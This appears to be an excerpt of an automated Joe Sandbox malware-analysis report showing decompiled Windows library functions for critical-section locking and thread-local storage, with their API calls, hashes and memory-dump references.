                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                  • String ID:
                  • API String ID: 2949335588-0
                  • Opcode ID: bd4760c49065bc264e8e5b21d6b9a7af9dba21f9fb3e279cf7a4ce5c93557814
                  • Instruction ID: c67d59306e024ad0e16bde5a0a6ba0c27b3e8643983254bc6767e2b362cbf32f
                  • Opcode Fuzzy Hash: bd4760c49065bc264e8e5b21d6b9a7af9dba21f9fb3e279cf7a4ce5c93557814
                  • Instruction Fuzzy Hash: B0116735600314EFD724CF59E884F5AB7E8FF55315F90806AE546876A2CBB4EC50CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424385, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424385(signed int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t9;
				signed int _t10;
				void* _t13;
				intOrPtr* _t14;

				_t10 = _a4;
				_t15 = _t10 - 0x11;
				if(_t10 >= 0x11) {
					_t4 = E00406436(_t7, _t9, _t10, _t13, _t15);
				}
				if( *0x4666dc == 0) {
					_t4 = E0042431C();
				}
				_t14 = 0x466890 + _t10 * 4;
				if( *_t14 == 0) {
					EnterCriticalSection(0x466878);
					if( *_t14 == 0) {
						_t4 = 0x4666e0 + _t10 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t14 =  *_t14 + 1;
					}
					LeaveCriticalSection(0x466878);
				}
				EnterCriticalSection(0x4666e0 + _t10 * 0x18);
				return _t4;
			}













                  0x0042438d
                  0x00424390
                  0x00424393
                  0x00424395
                  0x00424395
                  0x004243a1
                  0x004243a3
                  0x004243a3
                  0x004243ae
                  0x004243b8
                  0x004243bf
                  0x004243c4
                  0x004243cb
                  0x004243d1
                  0x004243d7
                  0x004243d7
                  0x004243de
                  0x004243de
                  0x004243ee
                  0x004243f4

                  APIs
                  • EnterCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243BF
                  • InitializeCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243D1
                  • LeaveCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243DE
                  • EnterCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243EE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                  • String ID:
                  • API String ID: 2895727460-0
                  • Opcode ID: dfab13008bdaf96ebf00f0eb18ec2ef9bb80e0054cfda95d03d59bec202288f4
                  • Instruction ID: 12cf9614eb4c710b7d9bc39edca722b45593c528368f68ea10bc041c1aee9ecf
                  • Opcode Fuzzy Hash: dfab13008bdaf96ebf00f0eb18ec2ef9bb80e0054cfda95d03d59bec202288f4
                  • Instruction Fuzzy Hash: 30F0C272301124AFDB106B5AFC45B1DB769FBD1355F520037F54083151EBB898408AAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042055C, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042055C(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x466584
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}







                  0x00420563
                  0x00420566
                  0x00420566
                  0x0042056a
                  0x00420570
                  0x00420575
                  0x0042059e
                  0x0042059f
                  0x00000000
                  0x004205a5
                  0x00420577
                  0x0042057a
                  0x00000000
                  0x00000000
                  0x0042057e
                  0x00420586
                  0x00000000
                  0x0042058d
                  0x00420594
                  0x00000000
                  0x0042059a

                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042056A
                  • TlsGetValue.KERNEL32(00466568,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042057E
                  • LeaveCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 00420594
                  • LeaveCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042059F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Leave$EnterValue
                  • String ID:
                  • API String ID: 3969253408-0
                  • Opcode ID: 340786f682d678f90d8c11d481e82e1f96306d9cde2d832645f35ad660a4072c
                  • Instruction ID: 125f687bcb126dd7327be4eaf8d3202bdee6bb285ee1efb8d35158a4d24e766b
                  • Opcode Fuzzy Hash: 340786f682d678f90d8c11d481e82e1f96306d9cde2d832645f35ad660a4072c
                  • Instruction Fuzzy Hash: 16F05476300228AFD7208F5AEC48C1B77EDFA893613554466F54693222D674F881CEDC
                  Uniqueness

                  Uniqueness Score: -1.00%